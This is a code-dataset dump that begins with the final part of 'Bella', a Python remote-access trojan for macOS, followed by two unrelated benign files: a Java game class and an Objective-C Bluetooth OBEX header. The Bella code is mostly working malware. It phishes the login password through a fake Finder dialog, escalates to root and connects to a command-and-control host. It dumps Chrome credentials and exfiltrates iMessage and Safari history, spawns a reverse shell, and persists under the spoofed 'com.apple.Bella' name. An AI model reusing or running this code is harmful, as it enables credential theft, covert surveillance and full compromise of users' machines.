send_msg("%sAccount password already found:\n%s\n" % (blue_star, check.replace("\n", "")), True)
return 1
#os.system("networksetup -setairportpower en0 off") We can't disable Wi-Fi actually, bc then we lose our connection
script = "launchctl asuser %s osascript -e 'tell app \"Finder\" to activate' -e 'tell app \"Finder\" to display dialog \"Could not find password to the network \\\"%s\\\". To access the network password please enter your keychain [login] password.\" default answer \"\" buttons {\"Always Allow\", \"Deny\", \"Allow\"} with icon file \"%s\" with hidden answer giving up after 15'" % (bella_UID, wifiNetwork, path) #with title \"Network Connection\" giving up after 15'" % wifiNetwork
out = subprocess.check_output(script, shell=True)
password = out.split("text returned:")[-1].replace("\n", "").split(", gave up")[0]
send_msg("%sUser has attempted to use password: [%s]\n" % (blue_star, password), False)
if password == "":
continue
if verifyPassword(userTB, password):
send_msg("%sVerified! Account password is: [%s]%s\n" % (greenPlus, password, endANSI), False)
subprocess_cleanup()
updateDB(encrypt("%s:%s" % (userTB, password)), 'localPass') #store encrypted pass in DB
#os.system("networksetup -setairportpower en0 on") #enable Wi-Fi
send_msg("%sUsing this password to root Bella.\n" % yellow_star, False)
rooter()
return 1
else:
send_msg("%sUser input: [%s] failed. Trying again.\n" % (red_minus, password), False)
return 1 #this should never get here, while loop should continue indefinitely.
def verifyPassword(username, password):
try:
output = subprocess.check_output("dscl /Local/Default -authonly %s %s" % (username, password), shell=True)
return True
except:
return False
def vnc_start(vnc_port):
send_msg('%sOpening VNC Connection.\n' % blue_star, False)
if readDB('vnc', True):
payload_path = payload_generator(readDB('vnc', True))
else:
return "%sNo VNC payload was found"
pipe = subprocess.Popen('%s -connectHost %s -connectPort %s -rfbnoauth -disableLog' % (payload_path, host, vnc_port), shell=True, stderr=subprocess.PIPE)
subprocess_manager(pipe.pid, '/'.join(payload_path.split('/')[:-1]), 'VNC')
send_msg('%sOpened VNC [%s].\n' % (blue_star, pipe.pid), False)
send_msg('%sOpening Stream.\n' % blue_star, False)
time.sleep(2)
send_msg("%sStarted VNC stream over -> %s:%s\n" % (blue_star, host, vnc_port), True)
return 0
def get_bella_path():
return helper_location
def get_bella_user():
return bella_user
def bella(*Emma):
### We start with having bella only work for the user who initially runs it ###
### For now, we will assume that the initial user to run Bella is NOT root ###
### This assumption is made bc if we have a root shell, we likely have a user shell ###
###set global whoami to current user, this will be stored as the original user in DB
global bellaConnection
if not os.path.isdir(get_bella_path()):
os.makedirs(get_bella_path())
creator = createDB() #createDB will reference the global whoami
if not creator[0]:
print "ERROR CREATING DATABASE %s" % creator[1]
pass
os.chdir("/Users/%s/" % get_bella_user())
if readDB('lastLogin') == False: #if it hasnt been set
updateDB('Never', 'lastLogin')
if not isinstance(get_model(), str): #if no model, put it in
output = check_output("sysctl hw.model")
if output[0]:
modelRaw = output[1].split(":")[1].replace("\n", "").replace(" ", "")
output = check_output("/usr/libexec/PlistBuddy -c 'Print :\"%s\"' /System/Library/PrivateFrameworks/ServerInformation.framework/Versions/A/Resources/English.lproj/SIMachineAttributes.plist | grep marketingModel" % modelRaw)
if not output[0]:
model = 'Macintosh'
else:
model = output[1].split("=")[1][1:] #get everything after equal sign, and then remove first space.
updateDB(model, 'model')
while True:
subprocess_cleanup()
print "Starting Bella"
#create encrypted socket.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(None)
bellaConnection = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, cert_reqs=ssl.CERT_NONE)
try:
print 'Connecting'
bellaConnection.connect((host,port))
print 'Connected'
except socket.error as e:
if e[0] == 61:
print 'Connection refused.'
pass
else:
print 'No connection: %s' % e
pass
time.sleep(5)
continue
print 'Listener active, server connected'
while True:
try:
remove_SUID_shell() #remove if it exists
print '%sAwaiting%s Data' % (yellow, endANSI)
data = recv_msg(bellaConnection)
print '%sReceived%s Data' % (green, endANSI)
if not data:
print 'Control disconnected'
break #start listening again.
elif data.startswith('cd'):
path = data[3:]
try:
if path.startswith("~"):
os.chdir(os.path.expanduser(path))
else:
os.chdir(path)
files = []
for x in os.listdir(os.getcwd()):
if not x.startswith('.'):
files.append(x)
stdout_val = '\n'.join(files)
send_msg("cwdcwd%s\n%s" % (os.getcwd(), stdout_val), True)
except OSError, e:
if e[0] == 2:
send_msg("%sNo such file or directory.\n" % red_minus, True)
else:
send_msg("%sError\n%s\n" % (red_minus, e), True)
elif data == 'ls': #will be our default ls handler
fileList = [] #this will be used for autocompletion.
filePrint = []
for x in os.listdir(os.getcwd()):
if not x.startswith('.') and x != "Icon\r":
fileList.append(x)
for x in sorted(fileList):
try:
perm = oct(os.stat(x).st_mode)[-3:]
timestamp = time.strftime("%h %e %H:%M", time.localtime(os.lstat(x).st_mtime))
size = byte_convert(os.lstat(x).st_size)
hardlinks = str(os.lstat(x).st_nlink)
isDirectory = stat.S_ISDIR(os.lstat(x).st_mode)
if isDirectory:
dirString = "d"
else:
dirString = "-"
isExecutable = False
if '1' in perm or '3' in perm or '7' in perm:
isExecutable = True
owner = pwd.getpwuid(os.lstat(x).st_uid).pw_name
group = grp.getgrgid(os.lstat(x).st_gid).gr_name
permList = {"0": "---", "1": "--x", "2": "-w-", "3": "-wx", "4": "r--", "5": "r-x", "6": "rw-", "7": "rwx"}
permString = "%s%s%s" % (permList["%s" % perm[0]], permList["%s" % perm[1]], permList["%s" % perm[2]] )
if isDirectory:
x = "%s%s%s/" % (light_blue, x, endANSI)
elif isExecutable:
x = "%s%s%s%s*" % (dark_green, bold, x, endANSI)
else:
pass
fileData = [dirString + permString, hardlinks, owner, group, size, timestamp, x]
filePrint.append(fileData)
except:
pass
send_msg('lserlser' + pickle.dumps((fileList, filePrint)), True)
elif data == 'quit' or data == 'exit':
send_msg("Exit", True)
elif data == "initializeSocket":
send_msg(initialize_socket(), True)
elif data.startswith("payload_response_SBJ29"):
payloads_encoded = data.split(':::')[1]
print 'Got payloads! %s' % payloads_encoded[:20]
print 'Creating DB from these payloads'
if inject_payloads(payloads_encoded):
send_msg('Injected payloads into Bella.\n', False)
print 'Injected'
else:
send_msg('Error injecting payloads', False)
print 'Error injecting payloads'
send_msg(initialize_socket(), True)
elif data == "iCloud_token":
tokenForce()
elif data == "insomnia_load":
send_msg(insomnia_load(), True)
elif data == "insomnia_unload":
send_msg(insomnia_unload(), True)
elif data == "manual":
send_msg(manual(), True)
elif data == "screen_shot":
send_msg(screenShot(), True)
elif data == "chrome_safe_storage":
chrome_safe_storage()
elif data == "check_backups":
send_msg(iTunes_backup_looker()[0], True)
elif data == "keychain_download":
send_msg(keychain_download(), True)
elif data == "iCloud_phish":
check = applepwRead()
if isinstance(check, str):
send_msg("%sAlready have an apple pass.\n%s\n" % (blue_star, check), True)
else:
send_msg("appleIDPhishHelp" + appleIDPhishHelp(), True)
elif data.startswith("iCloudPhishFinal"):
appleIDPhish(data[16:].split(":")[0], data[16:].split(":")[1])
elif data == "user_pass_phish":
user_pass_phish()
elif data.startswith("disableKM"):
send_msg(disable_keyboard_mouse(data[9:]), True)
elif data.startswith("enableKM"):
send_msg(enable_keyboard_mouse(data[8:]), True)
elif data == "reboot_server":
send_msg(os.kill(bellaPID, 9), True)
elif data == "current_users":
send_msg('\001\033[4mCurrently logged in users:\033[0m\002\n%s' % check_current_users(), True)
elif data == "bella_info":
bella_info()
elif data == "get_root":
rooter()
elif data == 'mike_stream':
time.sleep(3)
reader = readDB('microphone', True)
if not reader:
send_msg('%sError reading Microphone payload from Bella DB.\n' % red_minus, True)
else:
path = payload_generator(reader)
mike_helper(path)
elif data == "chrome_dump":
returnVal = ""
checkChrome = chromeSSRead()
if isinstance(checkChrome, str):
safe_storage_key = checkChrome
loginData = glob("/Users/%s/Library/Application Support/Google/Chrome/*/Login Data" % get_bella_user()) #dont want to do all
for x in loginData:
returnVal += chrome_dump(safe_storage_key, x)
send_msg(returnVal, True)
else:
send_msg("%s%sNo Chrome Safe Storage Key found!\n" % (returnVal, red_minus), True)
elif data == "iCloud_FMIP":
(username, password, usingToken) = iCloud_auth_process(False)
if password == False: #means we couldnt get any creds
send_msg(username, True) #send reason why
else:
if usingToken:
send_msg("%sCannot locate iOS devices with only a token. Run iCloudPhish if you would like to phish the user for their iCloud Password.\n" % red_minus, True)
else:
FMIP(username, password)
elif data == "iCloud_read":
key = "%sThere is no iCloud ID available.\n" % red_minus
check = applepwRead()
if isinstance(check, str):
key = applepwRead() + "\n"
send_msg(key, True)
elif data == "lpw_read":
key = "%sThere is no local account available.\n" % red_minus
check = local_pw_read()
if isinstance(check, str):
key = "%s\n" % check
send_msg(key, True)
elif data.startswith("mitm_start"):
interface = data.split(":::")[1]
cert = data.split(":::")[2]
mitm_start(interface, cert)
elif data.startswith("mitm_kill"):
interface = data.split(":::")[1]
certsha1 = data.split(":::")[2]
mitm_kill(interface, certsha1)
elif data == 'chat_history':
chatDb = globber("/Users/*/Library/Messages/chat.db") #just get first chat DB
serial = []
for x in chatDb:
data = bz2.compress(protected_file_reader(x))
serial.append((x.split("/")[2], data))
serialized = pickle.dumps(serial)
send_msg("C5EBDE1F" + serialized, True)
elif data == 'safari_history':
historyDb = globber("/Users/*/Library/Safari/History.db")
serial = []
for history in historyDb:
copypath = tempfile.mkdtemp()
with open('%s/safari' % copypath, 'w') as content:
content.write(protected_file_reader(history))
database = sqlite3.connect('%s/safari' % copypath)
sql = "SELECT datetime(hv.visit_time + 978307200, 'unixepoch', 'localtime') as last_visited, hi.url, hv.title FROM history_visits hv, history_items hi WHERE hv.history_item = hi.id;"
content = ""
with database:
try:
for x in database.execute(sql):
x = filter(None, x)
content += ' | '.join(x).encode('ascii', 'ignore') + '\n'
except:
pass
content = bz2.compress(content)
serial.append((history.split("/")[2], content)) #append owner of history
shutil.rmtree(copypath)
serialized = pickle.dumps(serial)
send_msg("6E87CF0B" + serialized, True)
elif data.startswith('download'):
fileName = data[8:]
try:
with open(fileName, 'rb') as content:
file_content = content.read()
send_msg("%sFound [%s]. Preparing for download.\n" % (yellow_star, fileName), False)
send_msg("downloader%s" % pickle.dumps((file_content, fileName)), True) #pack tuple
except IOError, e:
send_msg("%s%s\n" % (red_minus, e), True)
except OSError, e:
send_msg("%s%s\n" % (red_minus, e), True)
elif data.startswith('uploader'):
(file_content, fileName) = pickle.loads(data[8:])
try:
send_msg("%sBeginning write of [%s].\n" % (yellow_star, fileName), False)
with open(fileName, 'wb') as content:
content.write(file_content)
send_msg("%sSucessfully wrote [%s/%s]\n" % (blue_star, os.getcwd(), fileName), True)
except IOError, e:
send_msg("%s%s\n" % (red_minus, e), True)
except OSError, e:
send_msg("%s%s\n" % (red_minus, e), True)
elif data == "iCloud_query":
(error, errorMessage, dsid, token) = main_iCloud_helper()
if error:
send_msg(errorMessage, True)
else:
iCloud_storage_helper(dsid, token)
elif data == "iCloud_FMF":
(error, errorMessage, dsid, token) = main_iCloud_helper()
if error:
send_msg(errorMessage, True)
else:
cardData = get_card_data(dsid, token)
send_msg(heard_it_from_a_friend_who(dsid, token, cardData), True)
elif data == 'iCloud_contacts':
(error, errorMessage, dsid, token) = main_iCloud_helper()
if error:
send_msg(errorMessage, True)
else:
cardData = get_card_data(dsid, token)
for vcard in cardData:
send_msg("\033[1m%s\033[0m\n" % vcard[0][0], False)
for numbers in vcard[1]:
send_msg("[\033[94m%s\033[0m]\n" % numbers, False)
for emails in vcard[2]:
send_msg("[\033[93m%s\033[0m]\n" % emails, False)
localToken = tokenRead()
if localToken != False:
send_msg('\033[1mFound %s iCloud Contacts for %s!\033[0m\n' % (len(cardData), localToken.split("\n")[0]), True)
else:
send_msg('', True)
elif data == '3C336E68854':
time.sleep(2)
cmd = 'python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(\'/bin/bash\')" ' + host + ' 3818'
x = subprocess.Popen(cmd, shell=True)
print x.pid
send_msg('', True)
elif data.startswith('vnc_start'):
vnc_port = data.split(':::')[1]
time.sleep(3)
vnc_start(vnc_port)
elif data == 'removeserver_yes':
removeServer()
elif data == 'shutdownserver_yes':
send_msg("Server will shutdown in 3 seconds.\n", True)
subprocess_cleanup()
os.system("sleep 3; launchctl remove %s" % launch_agent_name)
#we shouldnt have to kill iTunes, but if there is a problem with launchctl ..
elif data == 'get_client_info':
output = check_output('scutil --get LocalHostName | tr -d "\n"; printf -- "->"; whoami | tr -d "\n"')
if not output[0]:
send_msg('Error-MB-Pro -> Error', True)
continue
send_msg(output[1], True)
else:
try:
blocking = False
blockers = ['sudo', 'nano', 'ftp', 'emacs', 'telnet', 'caffeinate', 'ssh'] #the best i can do for now ...
for x in blockers:
if x in data:
send_msg('%s[%s] is a blocking command. It will not run.\n' % (yellow_star, x), True)
blocking = True
break
if not blocking:
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
####### MAKE THIS A GLOBAL RUNNER FUNCTION THAT WILL BE USED IN LIEU OF ALL CHECK_OUTPUTS #######
done = False
while proc.poll() == None:
bellaConnection.settimeout(0.0) #set socket to non-blocking (dont wait for data)
try: #SEE IF WE HAVE INCOMING MESSAGE MID LOOP
if recv_msg(bellaConnection) == 'sigint9kill':
sys.stdout.flush()
proc.terminate()
send_msg('terminated', True) #send back confirmation along with STDERR
done = True
bellaConnection.settimeout(None)
break
except socket.error as e: #no message, business as usual
pass
bellaConnection.settimeout(None)
line = proc.stdout.readline()
if line != "":
send_msg(line, False)
else:
#at this point we are done with the loop, can get / send stderr
send_msg(line + proc.communicate()[1], True)
done = True
break
if not done:
send_msg(proc.stdout.read() + proc.stderr.read(), True)
except socket.error, e:
if e[0] == 32:
print "Listener disconnected, broken pipe."
pass
except Exception as e:
print e
send_msg(str(e), True)
except socket.error, e:
traceback.print_exc()
subprocess_cleanup()
print repr(e)
if e[0] == 54:
print "Listener disconnected, connection reset"
pass
break
except Exception:
#any error here will be unrelated to socket malfunction.
bella_error = traceback.format_exc()
print bella_error
send_msg('%sMalfunction:\n```\n%s%s%s\n```\n' % (red_minus, red, bella_error, endANSI), True) #send error to CC, then continue
continue
try:
bellaConnection.close()
except:
pass
##### Below variables are global scopes that are accessed by most of the methods in Bella. Should make a class structure #####
endANSI = '\001\033[0m\002'
bold = '\001\033[1m\002'
underline = '\001\033[4m\022'
red_minus = '\001\033[31m\002[-] %s' % endANSI
greenPlus = '\001\033[92m\002[+] %s' % endANSI
blue_star = '\001\033[94m\002[*] %s' % endANSI
yellow_star = '\001\033[93m\002[*] %s' % endANSI
violet = '\001\033[95m\002'
blue = '\001\033[94m\002'
light_blue = '\001\033[34m\002'
green = '\001\033[92m\002'
dark_green = '\001\033[32m\002'
yellow = '\001\033[93m\002'
red = '\001\033[31m\002'
bella_error = ''
cryptKey = 'edb0d31838fd883d3f5939d2ecb7e28c'
try:
computer_name = subprocess.check_output('scutil --get LocalHostName', shell=True).replace('\n', '')
except:
computer_name = platform.node()
if os.getuid() == 0:
bella_user = cur_GUI_user()
bella_UID = pwd.getpwnam(bella_user).pw_uid
else:
bella_user = getpass.getuser()
bella_UID = pwd.getpwnam(bella_user).pw_uid
bellaPID = os.getpid()
launch_agent_name = 'com.apple.Bella'
bella_folder = 'Containers/.bella'
if os.getuid() == 0:
home_path = ''
else:
home_path = os.path.expanduser('~')
if '/'.join(os.path.abspath(__file__).split('/')[:-1]).lower() != ('%s/Library/%s' % (home_path, bella_folder)).lower(): #then set up and load agents, etc
print '[%s], [%s]' % ('/'.join(os.path.abspath(__file__).split('/')[:-1]).lower(), ('%s/Library/%s' % (home_path, bella_folder)).lower())
print 'Bella is not in the proper folder. Resetting'
create_bella_helpers(launch_agent_name, bella_folder, home_path)
helper_location = '/'.join(os.path.abspath(__file__).split('/')[:-1]) + '/'
payload_list = []
temp_file_list = []
host = '127.0.0.1' #Command and Control IP (listener will run on)
port = 4545 #What port Bella will operate over
#### End global variables ####
if __name__ == '__main__':
bella()
| 94,516 | Bella | py | en | python | code | {"qsc_code_num_words": 13448, "qsc_code_num_chars": 94516.0, "qsc_code_mean_word_length": 4.68723974, "qsc_code_frac_words_unique": 0.12150506, "qsc_code_frac_chars_top_2grams": 0.02620808, "qsc_code_frac_chars_top_3grams": 0.00628232, "qsc_code_frac_chars_top_4grams": 0.01021671, "qsc_code_frac_chars_dupe_5grams": 0.40854142, "qsc_code_frac_chars_dupe_6grams": 0.34471872, "qsc_code_frac_chars_dupe_7grams": 0.31024526, "qsc_code_frac_chars_dupe_8grams": 0.28801916, "qsc_code_frac_chars_dupe_9grams": 0.27120284, "qsc_code_frac_chars_dupe_10grams": 0.24721579, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01641486, "qsc_code_frac_chars_whitespace": 0.16595074, "qsc_code_size_file_byte": 94516.0, "qsc_code_num_lines": 2136.0, "qsc_code_num_chars_line_max": 485.0, "qsc_code_num_chars_line_mean": 44.24906367, "qsc_code_frac_chars_alphabet": 0.78319443, "qsc_code_frac_chars_comments": 0.11420289, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.38956892, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.04204364, "qsc_code_frac_chars_string_length": 0.30074907, "qsc_code_frac_chars_long_word_length": 0.04659425, "qsc_code_frac_lines_string_concat": 0.0005322, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 0.0, "qsc_codepython_frac_lines_func_ratio": null, "qsc_codepython_cate_var_zero": null, "qsc_codepython_frac_lines_pass": 0.05588079, "qsc_codepython_frac_lines_import": 0.00585418, "qsc_codepython_frac_lines_simplefunc": null, "qsc_codepython_score_lines_no_logic": null, "qsc_codepython_frac_lines_print": 0.02288451} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 1, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 1, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/potions/brews/Brew.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.potions.brews;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.items.potions.Potion;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import java.util.ArrayList;
public abstract class Brew extends Potion {
@Override
public ArrayList<String> actions(Hero hero) {
ArrayList<String> actions = super.actions( hero );
actions.remove( AC_DRINK );
return actions;
}
@Override
public void setAction() {
defaultAction = AC_THROW;
}
@Override
public void doThrow(Hero hero) {
GameScene.selectCell(thrower);
}
@Override
public abstract void shatter( int cell );
@Override
public boolean isKnown() {
return true;
}
}
| 1,567 | Brew | java | en | java | code | {"qsc_code_num_words": 206, "qsc_code_num_chars": 1567.0, "qsc_code_mean_word_length": 5.7038835, "qsc_code_frac_words_unique": 0.5776699, "qsc_code_frac_chars_top_2grams": 0.05957447, "qsc_code_frac_chars_top_3grams": 0.1293617, "qsc_code_frac_chars_top_4grams": 0.04851064, "qsc_code_frac_chars_dupe_5grams": 0.15489362, "qsc_code_frac_chars_dupe_6grams": 0.04765957, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01307692, "qsc_code_frac_chars_whitespace": 0.17038928, "qsc_code_size_file_byte": 1567.0, "qsc_code_num_lines": 58.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 27.01724138, "qsc_code_frac_chars_alphabet": 0.89076923, "qsc_code_frac_chars_comments": 0.49776643, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.18518519, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.11111111, "qsc_codejava_score_lines_no_logic": 0.37037037, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/mac/LightAquaBlue/BBOBEXRequestHandler.h | /*
* Copyright (c) 2009 Bea Lam. All rights reserved.
*
* This file is part of LightBlue.
*
* LightBlue is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* LightBlue is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
*/
//
// BBOBEXRequestHandler.h
// LightAquaBlue
//
// These are internal classes used by BBBluetoothOBEXServer for handling
// incoming client requests. Each BBOBEXRequestHandler subclass encapsulates
// the process for handling a particular type of request.
//
#import <Foundation/Foundation.h>
#import <IOBluetooth/OBEX.h>
@class BBBluetoothOBEXServer;
@class BBOBEXHeaderSet;
@class BBMutableOBEXHeaderSet;
@class OBEXSession;
@interface BBOBEXRequestHandler : NSObject {
BBBluetoothOBEXServer *mServer;
SEL mServerEventSelector;
OBEXSession *mSession;
int mNextResponseCode;
BBMutableOBEXHeaderSet *mNextResponseHeaders;
}
+ (void)setDebug:(BOOL)debug;
- (id)initWithServer:(BBBluetoothOBEXServer *)server
eventSelector:(SEL)selector
session:(OBEXSession *)session;
- (void)setNextResponseCode:(int)responseCode;
- (void)addResponseHeaders:(BBOBEXHeaderSet *)responseHeaders;
- (BOOL)handleRequestEvent:(const OBEXSessionEvent *)event;
/*** for subclasses - calls errorOccurred:description: on delegate ***/
- (void)errorOccurred:(OBEXError)error
description:(NSString *)description;
/*** methods below must be overriden by subclasses, and should be regarded
as 'protected' - they don't need to be called by outside classes ***/
- (BOOL)readOBEXRequestHeaders:(BBMutableOBEXHeaderSet **)requestHeaders
andRequestFlags:(OBEXFlags *)flags
fromSessionEvent:(const OBEXSessionEvent *)event;
- (void)prepareResponseForRequestWithHeaders:(BBMutableOBEXHeaderSet *)requestHeaders
flags:(OBEXFlags)flags
isFinalRequestPacket:(BOOL)isFinalRequestPacket;
- (OBEXError)sendNextResponsePacket;
- (void)handleRequestAborted;
- (void)notifyRequestFinished;
@end
@interface BBOBEXConnectRequestHandler : BBOBEXRequestHandler {
CFMutableDataRef mHeadersDataRef;
OBEXMaxPacketLength mMaxPacketLength;
}
@end
@interface BBOBEXDisconnectRequestHandler : BBOBEXRequestHandler {
CFMutableDataRef mHeadersDataRef;
}
@end
@interface BBOBEXPutRequestHandler : BBOBEXRequestHandler {
CFMutableDataRef mHeadersDataRef;
BBMutableOBEXHeaderSet *mPreviousRequestHeaders;
NSOutputStream *mOutputStream;
BOOL mDefinitelyIsPut;
BOOL mAborted;
}
@end
@interface BBOBEXGetRequestHandler : BBOBEXRequestHandler {
CFMutableDataRef mHeadersDataRef;
NSMutableData *mSentBodyData;
NSInputStream *mInputStream;
BOOL mAborted;
}
@end
@interface BBOBEXSetPathRequestHandler : BBOBEXRequestHandler {
CFMutableDataRef mHeadersDataRef;
}
@end
| 3,391 | BBOBEXRequestHandler | h | en | c | code | {"qsc_code_num_words": 310, "qsc_code_num_chars": 3391.0, "qsc_code_mean_word_length": 8.15483871, "qsc_code_frac_words_unique": 0.58064516, "qsc_code_frac_chars_top_2grams": 0.02373418, "qsc_code_frac_chars_top_3grams": 0.10087025, "qsc_code_frac_chars_top_4grams": 0.02254747, "qsc_code_frac_chars_dupe_5grams": 0.03243671, "qsc_code_frac_chars_dupe_6grams": 0.0221519, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00179147, "qsc_code_frac_chars_whitespace": 0.17693896, "qsc_code_size_file_byte": 3391.0, "qsc_code_num_lines": 116.0, "qsc_code_num_chars_line_max": 86.0, "qsc_code_num_chars_line_mean": 29.23275862, "qsc_code_frac_chars_alphabet": 0.90397707, "qsc_code_frac_chars_comments": 0.36007078, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.21666667, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.0, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.01666667, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, 